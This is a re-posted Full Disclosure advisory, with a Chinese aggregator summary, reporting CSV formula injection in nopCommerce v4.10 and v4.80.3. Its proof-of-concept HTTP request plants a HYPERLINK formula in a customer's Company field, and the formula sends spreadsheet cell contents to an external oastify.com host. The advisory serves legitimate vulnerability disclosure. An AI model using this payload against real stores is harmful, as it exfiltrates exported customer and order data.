CSV Injection in nopcommerce v4.10 and 4.80.3
nopCommerce v4.10和v4.80.3版本存在CSV注入漏洞,允许攻击者通过恶意公式控制导出文件内容,在打开时执行代码。 2025-8-19 03:0:21 Author: seclists.org(查看原文) 阅读量:12 收藏
nopCommerce v4.10和v4.80.3版本存在CSV注入漏洞,允许攻击者通过恶意公式控制导出文件内容,在打开时执行代码。 2025-8-19 03:0:21 Author: seclists.org(查看原文) 阅读量:12 收藏
Full Disclosure mailing list archives
From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 17 Aug 2025 22:55:34 -0400
nopCommerce versions v4.10 and v4.80.3 are vulnerable to *C*SV Injection (Formula Injection) when exporting data to CSV. The application does not properly sanitize user-supplied input before including it in CSV export files. An attacker can inject malicious spreadsheet formulas into fields that will later be exported (for example, order details, product names, or customer information). When the exported file is opened in spreadsheet software such as Microsoft Excel or LibreOffice Calc, the injected formula is executed. POST /Admin/Customer/Edit/4 HTTP/2 Host: <host> Cookie: *** save=&Id=4&--snip--Company=%3DHYPERLINK%28%22http%3A%2F% 2F00yjdi594jbbty6hwkuhfssas1ysmtai.oastify.com%3Fdata%3D%22%26A1%26A2%26B2%26C2%26D2%2C+%22Click+me%22%29 --snip-- HTTP/2 200 OK _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- CSV Injection in nopcommerce v4.10 and 4.80.3 Ron E (Aug 18)
文章来源: https://seclists.org/fulldisclosure/2025/Aug/15
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh